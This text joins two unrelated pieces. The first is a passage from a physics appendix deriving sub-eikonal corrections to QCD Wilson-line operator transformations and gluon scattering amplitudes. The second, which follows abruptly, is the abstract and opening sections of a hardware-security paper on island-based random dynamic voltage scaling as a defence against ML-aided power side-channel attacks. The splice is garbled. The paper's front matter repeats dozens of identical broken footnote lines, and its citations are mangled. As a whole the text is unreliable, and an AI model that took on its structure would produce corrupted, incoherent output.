\Psi^{g\to gg}(k_{1}^{+},{\bf k}_{1},c_{1},\lambda_{1};k_{2}^{+},{\bf k}_{2},c_ {2},\lambda_{2},k_{3}^{+},{\bf k}_{3},c_{3},\lambda_{3})\] \[= -gf^{c_{1}c_{2}c_{3}}(2\pi)2k_{1}^{+}\delta(k_{1}^{+}-k_{2}^{+}- k_{3}^{+})\Big{[}z(1-z)\delta_{\lambda_{2},-\lambda_{3}}i\varepsilon_{\lambda_{1}}^{ j}-z\delta_{\lambda_{1}\lambda_{2}}i\varepsilon_{\lambda_{3}}^{j*}-(1-z) \delta_{\lambda_{1}\lambda_{3}}i\varepsilon_{\lambda_{2}}^{j*}\Big{]}\] \[\times\int_{{\bf k}_{1},{\bf k}_{2}}e^{-i{\bf k}_{1}\cdot({\bf y} _{1}-{\bf y}_{3})}e^{i{\bf k}_{2}\cdot({\bf y}_{2}-{\bf y}_{3})}\frac{2({\bf k }_{2}-z{\bf k}_{1})^{j}}{({\bf k}_{2}-z{\bf k}_{1})^{2}}\] \[= -gf^{c_{1}c_{2}c_{3}}(2\pi)2k_{1}^{+}\delta(k_{1}^{+}-k_{2}^{+}- k_{3}^{+})\Big{[}z(1-z)\delta_{\lambda_{2},-\lambda_{3}}i\varepsilon_{\lambda_{1}}^{ j}-z\delta_{\lambda_{1}\lambda_{2}}i\varepsilon_{\lambda_{3}}^{j*}-(1-z) \delta_{\lambda_{1}\lambda_{3}}i\varepsilon_{\lambda_{2}}^{j*}\Big{]}\] \[\times\int_{{\bf k}_{3},{\bf k}_{2}}e^{i{\bf k}_{3}\cdot({\bf y} _{3}-{\bf y}_{1})}e^{i{\bf k}_{2}\cdot({\bf y}_{2}-{\bf y}_{1})}\frac{2[(1-z){ \bf k}_{2}-z{\bf k}_{3}]^{j}}{[(1-z){\bf k}_{2}-z{\bf k}_{3}]^{2}}.\] In the last equality, we have the expression from integrating out the momentum \({\bf k}_{1}\) rather than the momentum \({\bf k}_{3}\). In the situation when the gluon radiated is soft \(z\to 0\), keeping terms up to linear order in \(z\), one obtains \[\Psi^{g\to gg}(k_{1}^{+},{\bf y}_{1},c_{1},\lambda_{1};k_{2}^{+},{ \bf y}_{2},c_{2},\lambda_{2},k_{3}^{+},{\bf y}_{3},c_{3},\lambda_{3})\Big{|}_{z \to 0}\] (B.14) \[= -gf^{c_{1}c_{2}c_{3}}(2\pi)2k_{1}^{+}\delta(k_{1}^{+}-k_{2}^{+}-k_ {3}^{+})\delta({\bf y}_{3}-{\bf y}_{1})2\frac{i}{2\pi}\frac{({\bf y}_{2}-{\bf y}_ {1})^{j}}{|{\bf y}_{2}-{\bf y}_{1}|^{2}}\] \[\times\Big{[}-\delta_{\lambda_{1}\lambda_{3}}i\varepsilon_{\lambda_{2 }}^{j*}+z\Big{(}\delta_{\lambda_{2},-\lambda_{3}}i\varepsilon_{\lambda_{1}}^{j}- \delta_{\lambda_{1}\lambda_{2}}i\varepsilon_{\lambda_{3}}^{j*}\Big{)}\Big{]}.\] In the sub-eikonal order, we only kept terms that transfer polarization information to the softer gluons. Sub-eikonal Transformations Related to \(a^{-}\) Field From the interaction term at the eikonal order \[\begin{split} V_{0}=&\int dx^{-}d^{2}\mathbf{x}a^{-}_ {b}(x^{+},0,\mathbf{x})J^{+}_{b}(0,x^{-},\mathbf{x})\\ =&\int dx^{-}d^{2}\mathbf{x}a^{-}_{b}(x^{+},0,\mathbf{ x})\left(g\bar{\Psi}\gamma^{+}t^{b}\Psi-ig[A^{i},F^{+i}]^{b}\right)\end{split} \tag{108}\] and the definition of Wilson line operator \[\hat{W}(x^{+}_{f},x^{+}_{i})=\mathcal{P}\text{Exp}\left\{-i\int_{x^{+}_{i}}^{x ^{+}_{f}}dz^{+}V_{(0),\text{I}}(z^{+})\right\} \tag{109}\] If one ignores the transformation to interaction picture in \(V_{(0),\text{I}}(z^{+})=e^{iH_{0}z^{+}}V_{(0)}e^{-iH_{0}z^{+}}\), one obtains the well-known transformations for creation operators at the eikonal order. \[\begin{split}&\hat{W}(x^{+}_{f},x^{+}_{i})\hat{a}^{\dagger}_{h, \lambda}(p^{+},\mathbf{y})\hat{W}^{\dagger}(x^{+}_{f},x^{+}_{i})=\hat{a}^{ \dagger}_{c,\lambda}(p^{+},\mathbf{y})U^{ch}_{\mathbf{y}}(x^{+}_{f},x^{+}_{i}),\\ &\hat{W}(x^{+}_{f},x^{+}_{i})\hat{b}^{\dagger}_{i,\rho}(p^{+}, \mathbf{y})\hat{W}^{\dagger}(x^{+}_{f},x^{+}_{i})=\hat{b}^{\dagger}_{j,\rho}( p^{+},\mathbf{y})V^{ji}_{\mathbf{y}}(x^{+}_{f},x^{+}_{i}),\\ &\hat{W}(x^{+}_{f},x^{+}_{i})\hat{d}^{\dagger}_{i,\rho}(p^{+}, \mathbf{y})\hat{W}^{\dagger}(x^{+}_{f},x^{+}_{i})=V^{\dagger,ij}_{\mathbf{y}}( x^{+}_{f},x^{+}_{i})\hat{d}^{\dagger}_{j,\rho}(p^{+},\mathbf{y}).\end{split} \tag{110}\] Here the Wilson lines in the adjoint representation and the fundamental representation are \[U_{\mathbf{y}}(x^{+}_{f},x^{+}_{i})=\mathcal{P}\text{exp}\left\{-ig\int_{x^{+ }_{i}}^{x^{+}_{f}}dz^{+}a^{-}_{b}(z^{+},\mathbf{y})T^{b}\right\}. \tag{111}\] \[V_{\mathbf{y}}(x^{+}_{f},x^{+}_{i})=\mathcal{P}\text{exp}\left\{-ig\int_{x^{+ }_{i}}^{x^{+}_{f}}dz^{+}a^{-}_{b}(z^{+},\mathbf{y})t^{b}\right\}. \tag{112}\] Our goal is to obtain sub-eikonal corrections to the transformations in eq. (110). Recall that the free Hamiltonian \[H_{0}=\frac{1}{2}\int dx^{-}d^{2}\mathbf{x}\left[\bar{\Psi}\frac{m^{2}+\partial _{l}\partial^{l}}{i\partial_{-}}\gamma^{+}\Psi-A^{i}_{a}\partial_{l}\partial^ {l}A^{a}_{i}\right] \tag{113}\] can be expressed in terms of creation and annihilation operators as \[H_{0}=\int_{p^{+},\mathbf{p}}E_{p}\Big{[}\hat{b}^{\dagger}_{p,\sigma}\hat{b}_ {p,\sigma}-\hat{d}_{p,\sigma}\hat{d}^{\dagger}_{p,\sigma}+\hat{a}^{\dagger}_{ p,\lambda}\hat{a}_{p,\lambda}\Big{]} \tag{114}\] The light-cone energy is \(E_{p}=p^{-}=\frac{\mathbf{p}^{2}}{2p^{+}}\) in which we have ignored the mass of quarks and gluons. From this explicit expression, the transformation to the _interaction picture_ is calculated to be \[e^{iH_{0}z^{+}}\hat{a}^{\dagger}_{\lambda}(p^{+},\mathbf{x})e^{-iH_{0}z^{+}}=e ^{i\frac{-\partial_{\mathbf{p}}^{2}}{2p^{+}}z^{+}}\hat{a}^{\dagger}_{\lambda}( p^{+},\mathbf{x}) \tag{115}\] similar transformations hold for \(\hat{b}^{\dagger}_{p,\sigma}\) and \(\hat{d}^{\dagger}_{p,\sigma}\). The color current has the explicit expression \[\begin{split}&\hat{J}^{+}_{b}(\mathbf{x})=\int dx^{-}J^{+}_{b}(0,x^{-},\mathbf{x})\\ =& g\int_{k^{+}}\Big{[}\hat{b}^{\dagger}_{i,\sigma}(k^ {+},\mathbf{x})t^{b}_{ij}\hat{b}_{j,\sigma}(k^{+},\mathbf{x})+\hat{d}_{i, \sigma}(k^{+},\mathbf{x})t^{b}_{ij}\hat{d}^{\dagger}_{j,\sigma}(k^{+},\mathbf{ x})+\hat{a}^{\dagger}_{c,\lambda}(k^{+},\mathbf{x})T^{b}_{ce}\hat{a}_{e,\lambda}(k^{+}, \mathbf{x})\Big{]}\end{split} \tag{116}\] Using this expression, one can obtain the commutation relations \[[J_{b}^{+}(\mathbf{x}),\hat{a}_{h,\lambda}^{\dagger}(p^{+},\mathbf{y })]=g\hat{a}_{c,\lambda}^{\dagger}(p^{+},\mathbf{x})T_{ch}^{b}\delta(\mathbf{x}- \mathbf{y}), \tag{112}\] \[[J_{b}^{+}(\mathbf{x}),\hat{b}_{j,\rho}^{\dagger}(p^{+},\mathbf{y })]=g\hat{b}_{i,\rho}^{\dagger}(p^{+},\mathbf{x})t_{ij}^{b}\delta(\mathbf{x}- \mathbf{y}),\] \[[J_{b}^{+}(\mathbf{x}),\hat{d}_{i,\rho}^{\dagger}(p^{+},\mathbf{y })]=-gt_{ij}^{b}\hat{d}_{j,\rho}^{\dagger}(p^{+},\mathbf{x})\delta(\mathbf{x}- \mathbf{y}).\] The eikonal Wilson line operator eq. (110) contains sub-eikonal contribution due to the transformation to interaction picture \(V_{0,I}(z^{+})=e^{iH_{0}z^{+}}V_{(0)}e^{-iH_{0}z^{+}}\). We need to compute its action on creation operators up to sub-eikonal order \[\hat{W}(z_{N}^{+},z_{0}^{+})\hat{a}_{h,\lambda}^{\dagger}(p^{+}, \mathbf{y})\hat{W}^{\dagger}(z_{N}^{+},z_{0}^{+}) \tag{113}\] \[=\lim_{\begin{subarray}{c}\Delta x^{+}\to 0,\\ N\Delta x^{+}=z_{N}^{+}-z_{0}^{+}\end{subarray}}\prod_{j=0}^{N-1}\hat{W}(z_{j+ 1}^{+},z_{j}^{+})\hat{a}_{h,\lambda}^{\dagger}(p^{+},\mathbf{y})\hat{W}^{ \dagger}(z_{j+1}^{+},z_{j}^{+}).\] We use gluon creation operator as an example to demonstrate the derivations. In eq. (113), it is computed by dividing the time interval \([x_{f}^{+},x_{i}^{+}]\) into \(N\) pieces \(\Delta x^{+}=\frac{x_{f}^{+}-x_{i}^{+}}{N}\) and in the end taking \(N\to\infty\) and \(\Delta x^{+}\to 0\) limit with \(N\Delta x^{+}=x_{f}^{+}-x_{i}^{+}\) fixed. We use the denotations \(z_{0}^{+}=x_{i}^{+}\), \(z_{i}^{+}=z_{0}^{+}+i\Delta x^{+}\), \(z_{N}^{+}=x_{f}^{+}\). For the general expression, it is unclear how to get a closed form expression by taking the limits directly. However, one can obtain closed form expression up to sub-eikonal order. The final result for the transformation of gluon creation operator by eikonal Wilson line operator up to eikonal order is \[\hat{W}(z_{N}^{+},z_{0}^{+})\hat{a}_{h,\lambda}^{\dagger}(p^{+}, \mathbf{y})\hat{W}^{\dagger}(z_{N}^{+},z_{0}^{+}) \tag{114}\] \[= \hat{a}_{c,\lambda}^{\dagger}(p^{+},\mathbf{y})U_{\mathbf{y}}^{ ch}(z_{N}^{+},z_{0}^{+})+\frac{i}{2p^{+}}\int_{z_{0}^{+}}^{z_{N}^{+}}dz^{+} \hat{a}_{c,\lambda}^{\dagger}(p^{+},\mathbf{y})\partial_{\mathbf{y}}^{2}U_{ \mathbf{y}}^{ch^{\prime}}(z_{N}^{+},z^{+})U_{\mathbf{y}}^{h^{\prime}h}(z^{+}, z_{0}^{+})\] \[\qquad\qquad+2\partial_{\mathbf{y}}^{i}\hat{a}_{c,\lambda}^{ \dagger}(p^{+},\mathbf{y})\partial_{\mathbf{y}}^{i}U_{\mathbf{y}}^{ch^{\prime} }(z_{N}^{+},z^{+})U_{\mathbf{y}}^{h^{\prime}h}(z^{+},z_{0}^{+})\] The first term recovers the well-known eikonal transformation and the second terms represents the sub-eikonal correction. Repeating the above analysis for the gluon annihilation operator, one gets \[\hat{W}^{\dagger}(z_{N}^{+},z_{0}^{+})\hat{a}_{h,\lambda}(p^{+}, \mathbf{y})\hat{W}(z_{N}^{+},z_{0}^{+}) \tag{115}\] \[= U_{\mathbf{y}}^{hc}(z_{N}^{+},z_{0}^{+})\hat{a}_{c,\lambda}(p^{+},\mathbf{y})+\frac{i}{2p^{+}}\int_{z_{0}^{+}}^{z_{N}^{+}}dz^{+}U_{\mathbf{y}}^ {hd}(z_{N}^{+},z^{+})\partial_{\mathbf{y}}^{2}U_{\mathbf{y}}^{dc}(z^{+},z_{0}^ {+})\hat{a}_{c,\lambda}(p^{+},\mathbf{y})\] \[\qquad\qquad+2U_{\mathbf{y}}^{hd}(z_{N}^{+},z^{+})\partial_{ \mathbf{y}}^{i}U_{\mathbf{y}}^{dc}(z^{+},z_{0}^{+})\partial_{\mathbf{y}}^{i} \hat{a}_{c,\lambda}(p^{+},\mathbf{y}).\] Using the above transformations, one can calculate the single gluon scattering amplitude, \[\begin{split}&\langle 0|\hat{a}_{c^{\prime},\lambda^{\prime}}(p^{ \prime+},{\bf x}^{\prime})\hat{W}(x_{f}^{+},x_{i}^{+})\hat{a}_{c,\lambda}^{ \dagger}(p^{+},{\bf x})|0\rangle\\ =&\frac{1}{2}\Big{[}\langle 0|W^{\dagger}(x_{f}^{+},x_ {i}^{+})\hat{a}_{c^{\prime},\lambda^{\prime}}(p^{\prime+},{\bf x}^{\prime}) \hat{W}(x_{f}^{+},x_{i}^{+})\hat{a}_{c,\lambda}^{\dagger}(p^{+},{\bf x})|0 \rangle\\ &\qquad+\langle 0|\hat{a}_{c^{\prime},\lambda^{\prime}}(p^{ \prime+},{\bf x}^{\prime})\hat{W}(x_{f}^{+},x_{i}^{+})\hat{a}_{c,\lambda}^{ \dagger}(p^{+},{\bf x})W^{\dagger}(x_{f}^{+},x_{i}^{+})|0\rangle\Big{]}\\ =&(2\pi)2p^{+}\delta(p^{+}-p^{\prime+})\delta_{ \lambda\lambda^{\prime}}\Big{\{}\delta({\bf x}-{\bf x}^{\prime})U_{\bf x}^{c^{ \prime}c}(x_{f}^{+},x_{i}^{+})\\ &+\frac{1}{2}\frac{i}{2p^{+}}\int_{x_{i}^{+}}^{x_{f}^{+}}dz^{+} \Big{[}U_{{\bf x}^{\prime}}^{c^{\prime}d}(x_{f}^{+},z^{+})\partial_{{\bf x}^{ \prime}}^{2}U_{{\bf x}^{\prime}}^{dc}(z^{+},z_{i}^{+})\delta({\bf x}-{\bf x}^ {\prime})+2U_{{\bf x}^{\prime}}^{c^{\prime}d}(x_{f}^{+},z^{+})\partial_{{\bf x }^{\prime}}^{i}U_{{\bf x}^{\prime}}^{dc}(z^{+},x_{i}^{+})\partial_{{\bf x}^{ \prime}}^{i}\delta({\bf x}-{\bf x}^{\prime})\Big{]}\\ &+\frac{1}{2}\frac{i}{2p^{+}}\int_{x_{i}^{+}}^{x_{f}^{+}}dz^{+} \Big{[}\delta({\bf x}^{\prime}-{\bf x})\partial_{{\bf x}}^{2}U_{{\bf x}}^{cd}( x_{f}^{+},z^{+})U_{{\bf x}}^{dc}(z^{+},x_{i}^{+})+2\partial_{{\bf x}}^{i} \delta({\bf x}^{\prime}-{\bf x})\partial_{{\bf x}}^{i}U_{{\bf x}}^{c^{\prime}d }(x_{f}^{+},z^{+})U_{{\bf x}}^{dc}(z^{+},x_{i}^{+})\Big{]}\Big{\}}\\ =&(2\pi)2p^{+}\delta(p^{+}-p^{\prime+})\delta_{ \lambda\lambda^{\prime}}\Big{\{}\delta({\bf x}-{\bf x}^{\prime})U_{\bf x}^{c^ {\prime}c}(x_{f}^{+},x_{i}^{+})\\ &-\frac{i}{2p^{+}}\int_{x_{i}^{+}}^{x_{f}^{+}}dz^{+}U_{{\bf x}^{ \prime}}^{c^{\prime}d}(x_{f}^{+},z^{+})\int_{{\bf z}}\big{[}\partial_{{\bf z} }^{i}\delta({\bf x}^{\prime}-{\bf z})\partial_{{\bf z}}^{i}\delta({\bf x}-{ \bf z})\big{]}\,U_{{\bf x}}^{dc}(z^{+},x_{i}^{+})\\ &-\frac{i}{2p^{+}}(x_{f}^{+}-x_{i}^{+})\frac{1}{2}\left[\partial_ {{\bf x}^{\prime}}^{2}\delta({\bf x}-{\bf x}^{\prime})U_{{\bf x}^{\prime}}^{c ^{\prime}c}(x_{f}^{+},x_{i}^{+})+\partial_{{\bf x}}^{2}\delta({\bf x}^{\prime }-{\bf x})U_{{\bf x}}^{c^{\prime}c}(x_{f}^{+},x_{i}^{+})\right]\Big{\}}.\end{split} \tag{14}\] In obtaining the last equality, we have repeatedly utilized integration by parts to move the partial derivatives to act on the Dirac delta functions instead of the Wilson lines. For the two terms at sub-eikonal order, the first term recovers the corresponding non local terms in the single gluon scattering amplitude in eq. (3.16) when setting the background field \(a^{i}=0,\psi_{B}=0\). The second term is a boundary term (boundary in the longitudinal direction, not the transverse direction) which is proportional to the width of the shockwave \(x_{f}^{+}-x_{i}^{+}\). It is precisely the phase factor from the free propagator given in Eq. (3.10). If one turns off the background fields \(a^{-}=0\), These two terms vanish as expected \[-\frac{i}{2p^{+}}(x_{F}^{+}-x_{I}^{+})\frac{1}{2}\delta^{c^{\prime}c}\int_{{ \bf z}}\partial_{{\bf z}}^{2}\left[\delta({\bf x}^{\prime}-{\bf z})\delta({\bf x }-{\bf z})\right]=0. \tag{15}\] We would like to calculate the contributions of sub-eikonal Taylor expansion of \(a_{b}^{-}J_{b}^{+}\) to the single particle scattering amplitude. The two sub-eikonal terms arer \[\int d^{2}{\bf z}dz^{+}dz^{-}\Big{[}z^{-}\partial_{-}a_{b}^{-}(z^{+},0,{\bf z} )J_{b}^{+}(0,z^{-},{\bf z})+z^{+}a_{b}^{-}(z^{+},0,{\bf z})\partial_{+}J_{b}^ {+}(0,z^{-},{\bf z})\Big{]} \tag{16}\] For the second term. The time dependence \(z^{+}\partial_{+}J^{+}(0,z^{-},{\bf z})\) is introduced by the lowest order expansion of \(e^{iH_{0}z^{+}}J_{b}^{+}(0,z^{-},{\bf z})e^{-iH_{0}z^{+}}\). In general the time dependence is generated by the full Hamiltonian \(e^{iHz^{+}}J_{b}^{+}(0,z^{-},{\bf z})e^{-iHz^{+}}\). In the case when \(H=H_{0}\), it is part of the sub-eikonal transformation that has already been included in obtaining eq. (14). One should not double count its contribution. For the first term, we utilized the gluonic part to demonstrate the derivations. The gluons' contribution to the time dependent color current is \[J_{0}^{+}(z^{+},z^{-},\mathbf{z})= gf^{bcd}\int_{p^{+},q^{+}}e^{i(p^{-}-q^{-})z^{+}}e^{i(p^{+}-q^{+})z^{-}} \hat{a}^{\dagger}_{c,\lambda}(p^{+},\mathbf{z})\hat{a}_{d,\lambda}(q^{+}, \mathbf{z})(-iq^{+}) \tag{111}\] \[+e^{-i(p^{-}-q^{-})z^{+}}e^{-i(p^{+}-q^{+})z^{-}}\hat{a}^{\dagger} _{d,\lambda}(q^{+},\mathbf{z})\hat{a}_{c,\lambda}(p^{+},\mathbf{z})(iq^{+}).\] Terms containing \(\hat{a}\hat{a}\) and \(\hat{a}^{\dagger}\hat{a}^{\dagger}\) will not contribute to single gluon scattering amplitude and we ignore them. The first term in eq. (110) contains \[\int dz^{-}z^{-}J_{b}^{+}(0,z^{-},\mathbf{z})=-gf^{bcd}\frac{1}{2}\int_{p^{+} }\Big{[}\hat{a}^{\dagger}_{c,\lambda}(p^{+},\mathbf{z})(\overrightarrow{ \partial_{p^{+}}}-\overleftarrow{\partial_{p^{+}}})\hat{a}_{d,\lambda}(p^{+},\mathbf{z})\Big{]}. \tag{112}\] Using this explicit expression, we now compute its contribution to the single gluon scattering amplitude at sub-eikonal order. \[= -gf^{bcd}\frac{1}{2}\int dz^{+}f_{b}^{+-}(z^{+},0,\mathbf{z}) \langle 0|\hat{a}_{c^{\prime},\lambda^{\prime}}(p^{\prime+},\mathbf{x}^{ \prime})\hat{W}(x_{f}^{+},z^{+})\rangle\hat{W}(x_{f}^{+},z^{+}) \tag{113}\] \[\times\int_{q^{+}}\Big{[}\hat{a}^{\dagger}_{c,\kappa}(q^{+}, \mathbf{z})(\overrightarrow{\partial_{q^{+}}}-\overleftarrow{\partial_{q^{+} }})\hat{a}_{d,\kappa}(q^{+},\mathbf{z})\Big{]}\hat{W}(z^{+},x_{i}^{+})\hat{a}^ {\dagger}_{c,\lambda}(p^{+},\mathbf{x})|0\rangle\] \[= ig\delta_{\lambda\lambda^{\prime}}\delta(\mathbf{x}-\mathbf{x}^{ \prime})\Big{[}(2\pi)(p^{+}+p^{\prime+})\partial_{p^{+}}\delta(p^{\prime+}-p^ {+})\Big{]}\int dz^{+}\left[U_{\mathbf{x}}(x_{f}^{+},z^{+})f^{+-}(z^{+},0, \mathbf{x})U_{\mathbf{x}}(z^{+},x_{i}^{+})\right]^{c^{\prime}c}.\] It is apparent that this sub-eikonal interaction involves longitudinal momentum exchange between the projectile and the shockwave. Transverse coordinates are preserved as well as the polarization. The polarized Wilson line has the insertion of longitudinal chromoelectric field \(f^{+-}=\partial_{-}a^{-}\). When calculating spin related observables at small \(x\), they are represented as the interference terms between the eikonal order amplitude and sub-eikonal order amplitude. The eikonal order amplitudes preserve longitudional momentum conservation and therefore they will not interfere with sub-eikonal interactions that involve longitudinal momentum exchange with the shockwave.
2306.04859
Island-based Random Dynamic Voltage Scaling vs ML-Enhanced Power Side-Channel Attacks
In this paper, we describe and analyze an island-based random dynamic voltage scaling (iRDVS) approach to thwart power side-channel attacks. We first analyze the impact of the number of independent voltage islands on the resulting signal-to-noise ratio and trace misalignment. As part of our analysis of misalignment, we propose a novel unsupervised machine learning (ML) based attack that is effective on systems with three or fewer independent voltages. Our results show that iRDVS with four voltage islands, however, cannot be broken with 200k encryption traces, suggesting that iRDVS can be effective. We finish the talk by describing an iRDVS test chip in a 12nm FinFet process that incorporates three variants of an AES-256 accelerator, all originating from the same RTL. This included a synchronous core, an asynchronous core with no protection, and a core employing the iRDVS technique using asynchronous logic. Lab measurements from the chips indicated that both unprotected variants failed the test vector leakage assessment (TVLA) security metric test, while the iRDVS was proven secure in a variety of configurations.
Dake Chen, Christine Goins, Maxwell Waugaman, Georgios D. Dimou, Peter A. Beerel
2023-06-08T01:12:19Z
http://arxiv.org/abs/2306.04859v2
# Island-based Random Dynamic Voltage Scaling vs ML-Enhanced Power Side-Channel Attacks ###### Abstract. In this paper, we describe and analyze an island-based random dynamic voltage scaling (iRDVS) approach to thwart power side-channel attacks. We first analyze the impact of the number of independent voltage islands on the resulting signal-to-noise ratio and trace misalignment. As part of our analysis of misalignment, we propose a novel unsupervised machine learning (ML) based attack that is effective on systems with three or fewer independent voltages. Our results show that iRDVS with four voltage islands, however, cannot be broken with 200k encryption traces, suggesting that iRDVS can be effective. We finish the talk by describing an iRDVS test chip in a 12nm FinFET process that incorporates three variants of an AES-256 accelerator, all originating from the same RTL. This included a synchronous core, an asynchronous core with no protection, and a core employing the iRDVS technique using asynchronous logic. Lab measurements from the chips indicated that both unprotected variants failed the test vector leakage assessment (TVLA) security metric test, while the iRDVS was proven secure in a variety of configurations. Hardware security; Side-channel attack; Machine learning + Footnote †: journal: Computer Communications Communications + Footnote †: journal: Computer Communications Communications + Footnote †: journal: Computer Communications Communications + Footnote †: journal: Computer Communications Communications + Footnote †: journal: Computer Communications Communications + Footnote †: journal: Computer Communications Communications + Footnote †: journal: Computer Communications Communications + Footnote †: journal: Computer Communications Communications + Footnote †: journal: Computer Communications Communications + Footnote †: journal: Computer Communications Communications + Footnote †: journal: Computer Communications Communications + Footnote †: journal: Computer Communications Communications + Footnote †: journal: Computer Communications Communications + Footnote †: journal: Computer Communications Communications + Footnote †: journal: Computer Communications Communications + Footnote †: journal: Computer Communications Communications + Footnote †: journal: Computer Communications Communications + Footnote †: journal: Computer Communications Communications + Footnote †: journal: Computer Communications Communications + Footnote †: journal: Computer Communications Communications + Footnote †: journal: Computer Communications Communications + Footnote †: journal: Computer Communications Communications + Footnote †: journal: Computer Communications Communications + Footnote †: journal: Computer Communications Communications + Footnote †: journal: Computer Communications + Footnote †: journal: Computer Communications Communications + Footnote †: journal: Computer Communications Communications + Footnote †: journal: Computer Communications Communications + Footnote †: journal: Computer Communications Communications + Footnote †: journal: Computer Communications Communications + Footnote †: journal: Computer Communications Communications + Footnote †: journal: Computer Communications Communications + Footnote †: journal: Computer Communications + Footnote †: journal: Computer Communications Communications + Footnote †: journal: Computer Communications Communications + Footnote †: journal: Computer Communications + Footnote †: journal: Computer Communications + Footnote †: journal: Computer Communications Communications + Footnote †: journal: Computer Communications + Footnote †: journal: Computer Communications + Footnote †: journal: Computer Communications Communications + Footnote †: journal: Computer Communications + Footnote †: journal: Computer Communications Communications + Footnote †: journal: Computer Communications Communications + Footnote †: journal: Computer Communications + Footnote †: journal: Computer Communications Communications + Footnote †: journal: Computer Communications + Footnote †: journal: Computer Communications Communications + Footnote †: journal: Computer Communications + Footnote †: journal: Computer Communications + Footnote †: journal: Computer Communications Communications + Footnote †: journal: Computer Communications Communications + Footnote †: journal: Computer Communications + Footnote †: journal: Computer Communications Communications + Footnote †: journal: Computer Communications Communications + Footnote †: journal: Computer Communications + Footnote †: journal: Computer Communications Communications + Footnote †: journal: Computer Communications Communications + Footnote †: journal: Computer Communications Communications + Footnote †: journal: Computer Communications + Footnote †: journal: Computer Communications Communications + Footnote †: journal: Computer Communications + Footnote †: journal: Computer Communications Communications + Footnote †: journal: Computer Communications + Footnote †: journal: Computer Communications Communications + Footnote †: journal: Computer Communications + Footnote †: journal: Computer Communications Communications + Footnote †: journal: Computer Communications + Footnote †: journal: Computer Communications + Footnote †: journal: Computer Communications + Footnote †: journal: Computer Communications + Footnote †: journal: Computer Communications + Footnote †: journal: Computer Communications + Footnote †: journal: Computer Communications + Footnote †: journal: Computer Communications + Footnote †: journal: Computer Communications + Footnote †: journal: Computer Communications + Footnote †: journal: Computer Communications + Footnote †: journal: Computer Communications + Footnote †: journal: Computer Communications + Footnote †: journal: Computer Communications + + Footnote †: journal: Computer Communications + Footnote †: journal: Computer Communications + Footnote †: journal: Computer Communications + Footnote †: journal: Computer Communications + Footnote †: journal: Computer Communications + Footnote †: journal: Computer Communications + Footnote †: journal: Computer Communications + Footnote †: journal: Computer Communications + Footnote †: journal: Computer Communications + Footnote †: journal: Computer Communications + Footnote †: journal: Computer Communications + Footnote †: journal: Computer Communications + Footnote †: journal: Computer Communications + Footnote †: journal: Computer Communications + Footnote †: journal: Computer Communications + Footnote †: journal: Computer Communications + + Footnote †: journal: Computer Communications + Footnote †: journal: Computer Communications + Footnote †: journal: Computer Communications + Footnote †: journal: Computer Communications + Footnote †: journal: Computer Communications + + Footnote †: journal: Computer Communications the iRDVS design. Section 4 and Section 5 analyze the SNR and misalignment characteristics of our approach as a function of the number of islands, and Section 6 focuses on our proposed ML attack. Section 7 and Section 8 describes the details of our simulation experiments and measurement results. Finally, we provide a summary of this work with our plans for future work in Section 9. ## 2. Background This section summarizes correlation-based power analysis, provides details on the elastic alignment technique used to test our approach, and introduces three common metrics for quantifying countermeasure effectiveness. ### Correlation-Based Power Analysis Power analysis attacks take advantage of the dependence of a circuit's power consumption on the data it processes. A common method of disclosing this correlation employs a differential technique introduced by Kocher et al. (Kocher et al., 2011) called _differential power analysis_ (_DPA_) that recovers keys bit-by-bit. Another powerful technique requiring less knowledge of the algorithm implementation, introduced by Brier et al., is _correlation-based power analysis_ (_CPA_) (Brier et al., 2016). Brier et al. demonstrated that all countermeasures against CPA provide similar defensive effectiveness against DPA. Moreover, CPA is capable of attacking several bits at a time instead of only a single bit. Because of this advantage, we applied CPA in our experiments. ### Elastic Alignment Woudenberg et al. (Woudenberg et al., 2011) propose a powerful alignment algorithm, _elastic alignment_, to preprocess traces corrupted by random delay insertion or an unstable clock. The two step procedure aligns recorded traces to a single reference. First, it leverages a traditional algorithm, _dynamic time warping_, to find a _warp path_ that maps the time steps of each sample trace to those of a reference trace. To do this, the algorithm computes the Euclidean difference between each target trace \(t\) and a reference trace \(r\), captured in a 2-D cost matrix of size \(P\times Q\), where \(P\) and \(Q\) are the lengths of traces \(t\) and \(r\), respectively. It then applies dynamic programming to identify the minimum-cost path through the matrix between points \((0,0)\) and \((P,Q)\). This path defines the correspondence between traces \(r\) and \(t\). Secondly, guided by this path, elastic alignment averages across samples when multiple samples of \(t\) map to one time step and duplicates samples of \(t\) when one sample of \(t\) maps to multiple time steps. We reproduce this approach and show it can effectively align the traces corrupted by the frequency-scaled technique. ### Metrics for Countermeasure Effectiveness There are three common metrics for measuring side-channel countermeasure effectiveness. The first is _Minimum Traces to Disclosure (MTD)_, which is the number of encryption/decryption traces required to disclose all of the secret information. A higher MTD indicates a more secure countermeasure. This metric requires that all bytes of the secret are guessed correctly. _Partial Guessing Entropy (PGE)_(Brier et al., 2016) can be a more practical evaluation metric than MTD because it does not require a correctly-guessed secret. PGE is computed from the ranking of possible values of the subkey bytes in descending order of correlation as estimated by the Pearson correlation coefficient. PGE is the rank of the correct subkey, where a PGE of 0 denotes that the subkey was correctly guessed. A large PGE indicates a low correlation of the correct subkey and consequently a system robust to attacks. The _Test Vector Leakage Analysis (TVLA)_ is also commonly used to evaluate side-channel leakage (Brier et al., 2016). The test conducts two experiments with fixed and random plaintexts and generates a large number of traces respectively, and the power samples from two groups are used for calculating a t-score at each time step. The t-score is a statistical measure of how different traces from the fixed and random encryptions are from one another. A higher t-score indicates that the difference between the fixed and random traces is less likely to have occurred by chance, suggesting the device exhibits higher leakage that would make a power analysis attack more likely to succeed. ## 3. Island-Based Random Dvs Traditional DVS countermeasures can be attacked if the random dynamic voltage is uncovered (Brier et al., 2016). Attackers can scale measured power traces in time and amplitude to match a reference trace, which renders DVS designs vulnerable. To circumvent the weaknesses of single-island DVS, this paper proposes using several independent voltages in an _island-based random DVS (iRDVS)_ framework, illustrated in Figure 1. iRDVS makes side-channel attacks more difficult because attackers must differentiate between multiple simultaneous random dynamic voltages. One practical means of implementing this iRDVS framework for a pipelined design is to partition each combinational stage into multiple islands with independent voltages. The voltages can be randomly adjusted with the constraint that the delay of each pipeline stage is roughly the same, thereby maximizing overlapping computation and minimizing the chance of introducing timing side channels. Multiple islands can share one voltage supply to support scaling this approach to large circuits with many islands. The islands need not all be the same size but can be adjusted based on both logical and physical constraints and communicate using asynchronous channels that implement the flow-control necessary to Figure 1. Illustration of a typical iRDVS structure with \(n=9\) islands and \(m=3\) independent voltages. Each independent voltage domain has a different color and each cloud represents a group of logic; the shaded logic is under attack. cope with different stage delays (Brandt et al., 